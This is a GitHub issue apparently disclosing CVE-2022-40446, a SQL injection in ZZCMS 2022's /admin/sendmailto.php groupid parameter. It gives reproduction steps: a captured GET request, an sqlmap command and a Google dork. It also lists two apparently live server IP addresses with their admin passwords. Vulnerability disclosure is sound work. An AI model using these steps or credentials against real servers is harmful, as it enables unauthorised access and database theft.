Headline
CVE-2022-40446: ZZCMS2022 is vulnerable to SQL injection · Issue #4 · liong007/ZZCMS
ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the component /admin/sendmailto.php?tomail=&groupid=.
**Exploit Title:**ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
**Tested on:**Windows Server 2008,Ubuntu
Attack vector(s):
zzcms is a set of content management system (CMS) of China’s zzcms team.
ZZCMS2022 is vulnerable to SQL injection via /admin/sendmailto.php?tomail=&groupid=.
Vendor Homepage: http://www.zzcms.net/about/6.html
Just after deployment, the version is “powered by zzcms2021”
After deployment, it will be automatically upgraded to powered by zzcms2022 the next day
Affected pages:
All pages that contain page “/admin/sendmailto.php?tomail=&groupid=”
For Example :
You need to use an IP address in China to access.
Case 1:
Login http://119.28.176.129/admin
User: admin
Password: 123456
1) click “发E-mail”, click “发送”, Return error “select email from zzcms_user where groupid=1 order by id asc limit 0,2完成”
Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities
2) Capturing packets and viewing SQL injection points
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 119.28.176.129
3) Scan with sqlmap
sqlmap.py -r sql2022.txt
The contents of sql2022.txt are as follows:
Sqlmap scan results:
Case 2:
Login http://175.6.210.20:81/admin
User: admin
Password: 123456789qwe
- click “发E-mail”, click “发送”, Return error “select email from zzcms_user where groupid=1 order by id asc limit 0,2”
Condition variables in SQL statement select are not protected by single quotation marks, which may lead to SQL injection vulnerabilities
Capturing packets and viewing SQL injection points
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 175.6.210.20:81Scan with sqlmap
sqlmap.py -r sql2022-2.txt
The contents of sql2022-2.txt are as follows:
Sqlmap scan results: